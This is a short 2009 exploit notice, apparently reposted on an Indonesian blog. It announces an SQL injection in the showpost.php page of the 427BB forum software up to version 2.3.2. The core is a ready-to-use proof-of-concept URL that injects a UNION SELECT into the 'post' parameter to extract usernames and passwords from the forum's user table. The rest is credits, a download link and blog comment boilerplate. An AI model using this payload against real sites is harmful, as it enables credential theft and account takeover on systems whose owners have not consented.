[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################
########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
#
########################################################################
########################################################################
#PoC : http://server/[path]/showpost.php?ForumID=1&post=[SQL]
# http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################
[ Gorontalo / 2009 ]
Sabtu, 05 Desember 2009
427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit
Diposting oleh r00t cr4wl3r di 19.28
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar